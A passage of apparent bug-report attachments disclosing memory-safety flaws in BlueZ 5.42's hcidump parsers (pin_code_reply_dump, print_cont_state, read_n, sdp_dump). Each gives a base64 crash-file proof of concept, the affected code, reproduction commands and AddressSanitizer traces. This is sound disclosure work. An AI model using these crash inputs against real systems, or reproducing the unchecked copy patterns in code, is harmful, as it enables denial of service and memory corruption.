#2 0x48701c in hci_dump tools/parser/hci.c:4116
#3 0x4035d4 in parse tools/parser/parser.h:260
#4 0x4035d4 in read_dump tools/hcidump.c:425
#5 0x4035d4 in main tools/hcidump.c:810
#6 0x7bf781766b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x0000005bd780 is located 15 bytes to the right of global variable '*.LC615' from 'tools/parser/hci.c' (0x5bd760) of size 17
'*.LC615' is ascii string 'Inquiry Complete'
0x0000005bd780 is located 32 bytes to the left of global variable '*.LC616' from 'tools/parser/hci.c' (0x5bd7a0) of size 15
'*.LC616' is ascii string 'Inquiry Result'
SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/hci.c:3670 le_meta_ev_dump
Shadow bytes around the buggy address:
0x0000800afaa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0000800afab0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 06 f9
0x0000800afac0: f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9 00 00 00 00
0x0000800afad0: 06 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x0000800afae0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 01 f9
=>0x0000800afaf0:[f9]f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 01 f9
0x0000800afb00: f9 f9 f9 f9 00 00 f9 f9 f9 f9 f9 f9 00 00 01 f9
0x0000800afb10: f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9 00 00 00 01
0x0000800afb20: f9 f9 f9 f9 00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0000800afb30: 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x0000800afb40: 00 00 00 06 f9 f9 f9 f9 00 00 03 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==30076==ABORTING
[-- Attachment #8: pin_code_reply_dump_BO.txt --]
[-- Type: text/plain, Size: 5512 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "pin_code_reply_dump" function in "tools/parser/hci.c" source file. The issue exist because "pin" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame "pin_code_reply_cp *cp" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IABAl5CgBAQEBAQoBA0EAJCQkEMC0dHOleIAAABkAAEGhwIX/39vllIgSmQBAAAAgD5sGv9mAAAB
AQASRD4+WCE7AAAABAEAED4+PlgAAR8ADuYBAD4IBBo+/T660AMEAQAwPj4+WAABHwAD5gEAPgAE
Fj4BAP//AwQBAAVRPj1YBj666AMEAQASPj4+WBo+utgDBAEA/5wAAAPmAQAAAwQBABIkAAABAD66
2AMEAQD/fwAAGBo+AAAAAQEAEiQ+PlgAAbrYAwQBAH8+PlA8Gjq6AAMEAQAwJj4+WAABHwAD5gEA
PgAEGjgaEAAESgABAAD5gD5sGv9mBgDmAQA+CAQaPho+utADBAEAMD4+PlgAAR8AA+YBADA+Pj5Y
AAEfAAPmAQA+lxYaPho+utgDBAEAMD5HPloAAR8AA+YBAD4ABBo+Gj662BIEAQCMPj5NWBo+ugAD
BAEAAJCPjwBAj5TTgAABABI+TT5YGv+AAPYEAQASPj4BAAAAugADBAEAED4+PlgAAR8ADuYBAD4I
BBo+Gj662AMEAQAwPj4+WAABHwAD5gEAPgAEFj5APv//AwQBAAU+Pj1YBj7c6AMEAQASPj4+WBo+
utgDBAEA/5wAABgaZLoAAwQBABIkPj5YGj662AMEAQD/fwAAGBo+AAAAAQEAMyQ+PlgAAbrYA4QB
ABI+Pj08Gjq6AAMEAQAwPj4+WPsAHwADAAEAPgAEGjgaPrr4AwQBAGQA//9/cn9EBEoAAQASPj4+
WBo+utgDBAEAEj4+PTw6ProAAwQBADA+Pj5YAD662AMEAQASPj49PDo+ugADBAEAMD4+PlgAAR8A
A+YBAD6XFho+Gj662AMEAQAwPkc+WgABHwAD5gEAPgAEGj4aPrrYEgQBAIw+Pk1YGj66AAMEAQAA
kI+PAECPlNOAAAEAEj5NPlga/4AA9gQBABI+PgEAAAC6AAMEAQAQPj4+WAABHwAO5gEAPggEGj4a
PrrYAwQBADA+Pj5YAAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwQBABI+Pj5YGj662AME
AQD/nAAAGBo+ugADBAEAEiQ+PlgaPrrYAwQBAP9/AAAYGj4AAAABABI+Pj49PDo+ugADBAEA
Affected code:
981 static inline void pin_code_reply_dump(int level, struct frame *frm)
982 {
983 pin_code_reply_cp *cp = frm->ptr;
984 char addr[18], pin[17];
985
986 p_indent(level, frm);
987 p_ba2str(&cp->bdaddr, addr);
988 memset(pin, 0, sizeof(pin));
989 if (parser.flags & DUMP_NOVENDOR)
990 memset(pin, '*', cp->pin_len);
991 else
992 memcpy(pin, cp->pin_code, cp->pin_len);
993 printf("bdaddr %s len %d pin \'%s\'\n", addr, cp->pin_len, pin);
994 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==24887==ERROR: AddressSanitizer: unknown-crash on address 0x7aea85364520 at pc 0x4787ca bp 0x7aea85364450 sp 0x7aea85364448
WRITE of size 209 at 0x7aea85364520 thread T0
#0 0x4787c9 in pin_code_reply_dump tools/parser/hci.c:992
#1 0x4787c9 in command_dump tools/parser/hci.c:1752
#2 0x479623 in hci_dump tools/parser/hci.c:4112
#3 0x4035d4 in parse tools/parser/parser.h:260
#4 0x4035d4 in read_dump tools/hcidump.c:425
#5 0x4035d4 in main tools/hcidump.c:810
#6 0x6f5f04015b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#7 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
Address 0x7aea85364520 is located in stack of thread T0 at offset 160 in frame
#0 0x46b3cf in command_dump tools/parser/hci.c:1685
This frame has 6 object(s):
[32, 38) 'b'
[96, 104) 't'
[160, 177) 'pin' <== Memory access at offset 160 partially overflows this variable
[224, 242) 'addr' <== Memory access at offset 160 partially underflows this variable
[288, 344) 'tm' <== Memory access at offset 160 partially underflows this variable
[384, 633) 'name'
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/hci.c:992 pin_code_reply_dump
Shadow bytes around the buggy address:
0x0f5dd0a64850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a64860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a64870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a64880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a64890: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
=>0x0f5dd0a648a0: f2 f2 f2 f2[00]00 01 f4 f2 f2 f2 f2 00 00 02 f4
0x0f5dd0a648b0: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2
0x0f5dd0a648c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a648d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01
0x0f5dd0a648e0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x0f5dd0a648f0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==24887==ABORTING
[-- Attachment #9: print_cont_state_OOB.txt --]
[-- Type: text/plain, Size: 4171 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was observed in "print_cont_state" function in "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAABP8EDP///n//AgICFwIXAAEAAj4AAAEAAAC1tY8ABP//////jikAmM0gAPf/GRAAf40VAIoC
AgITAjIAAAAFPgAAAQABAAACAAD/AOsaAP+OKZKYzSAACQAaqQCQjQAAnwICQhMCFwAAAAU+AAAB
AQAAq7WPAAT///b//44pAJjNIAAEAQASPj4+WBo+utgDBAEA/5wAABgaProAAwC1tXQABP//////
jikAmM0gAPf/GRAAf40VAIoCAgITAjIAAAAFPgAAAQABAIAAAAD/AOsaAP+OKZKYzSAA9/8ZqQCQ
jQAAnwICQhMCFwAAAAU+AAABAQAAq7WPAAT///b//44pAJjNIAAEAT6jAAM+PlgaPj49PBo+ugAb
BAEAMD4+WBo+utgDBAEAEj4+PTwaProAAwQBADA+Pj5YAAEf
Affected code:
568 static inline void print_cont_state(int level, unsigned char *buf)
569 {
570 uint8_t cont = buf[0];
571 int i;
572
573 p_indent(level, 0);
574 printf("cont");
575 for (i = 0; i < cont + 1; i++)
576 printf(" %2.2X", buf[i]);
577 printf("\n");
578 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==6337==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef96 at pc 0x4e39ec bp 0x7f3553ec2550 sp 0x7f3553ec2548
READ of size 1 at 0x60600000ef96 thread T0
#0 0x4e39eb in print_cont_state tools/parser/sdp.c:576
#1 0x4e39eb in sdp_dump tools/parser/sdp.c:764
#2 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
#3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x7da2df158b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000ef96 is located 0 bytes to the right of 54-byte region [0x60600000ef60,0x60600000ef96)
allocated by thread T0 here:
#0 0x7da2df53673f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
#2 0x1f
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/sdp.c:576 print_cont_state
Shadow bytes around the buggy address:
0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c0c7fff9df0: 00 00[06]fa fa fa fa fa fd fd fd fd fd fd fd fa
0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==6337==ABORTING
[-- Attachment #10: read_n_BO.txt --]
[-- Type: text/plain, Size: 9360 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "read_n" function in "tools/hcidump.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
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
j48=
Affected code:
104 static inline int read_n(int fd, char *buf, int len)
105 {
106 int t = 0, w;
107
108 while (len > 0) {
109 if ((w = read(fd, buf, len)) < 0) {
110 if (errno == EINTR || errno == EAGAIN)
111 continue;
112 return -1;
113 }
114 if (!w)
115 return 0;
116 len -= w; buf += w; t += w;
117 }
118 return t;
119 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==19127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x7034529f99b6 bp 0x7289d18014f0 sp 0x7289d18014d8
WRITE of size 3712 at 0x61b00001f75c thread T0
#0 0x7034529f99b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
#1 0x403a3b in read_n tools/hcidump.c:109
#2 0x403a3b in read_dump tools/hcidump.c:397
#3 0x403a3b in main tools/hcidump.c:810
#4 0x703452646b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#5 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x703452a2473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 read
Shadow bytes around the buggy address:
0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==19127==ABORTING
[-- Attachment #11: sdp_dump_OOB.txt --]
[-- Type: text/plain, Size: 3960 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was observed in "sdp_dump" function in "tools/parser/sdp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAABP8EDP///3//AgICFwIXAAEAAj4AAAEAAAC1tY8ABADrGgD/jikAmM0gAPf/GRAAkI0VAJ8C
AgITAhcAAAAFPgAAAQz///9//wICAhcCFwABAAI+AAAAtbX/GRAAkI0VAJ8CAgAAAPgCAgICQAAA
Affected code:
749 case SDP_SERVICE_ATTR_RSP:
750 /* Parse AttributeByteCount */
751 count = p_get_u16(frm);
752 p_indent(level + 1, frm);
753 printf("count %d\n", count);
754
755 /* Parse ContinuationState */
756 cont = *(unsigned char *)(frm->ptr + count);
757
758 if (cont == 0) {
759 /* Parse AttributeList */
760 print_attr_list(level + 1, frame_get(frm, count));
761 } else
762 frame_add(frm, count);
763
764 print_cont_state(level + 1, frm->ptr + count);
765 break;
766
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==17871==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fe8f at pc 0x4e30b5 bp 0x7ce9e036fa90 sp 0x7ce9e036fa88
READ of size 1 at 0x61b00001fe8f thread T0
#0 0x4e30b4 in sdp_dump tools/parser/sdp.c:756
#1 0x49a9c2 in l2cap_parse tools/parser/l2cap.c:1464
#2 0x479c9c in acl_dump tools/parser/hci.c:4041
#3 0x479c9c in hci_dump tools/parser/hci.c:4120
#4 0x4035d4 in parse tools/parser/parser.h:260
#5 0x4035d4 in read_dump tools/hcidump.c:425
#6 0x4035d4 in main tools/hcidump.c:810
#7 0x6c387c278b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
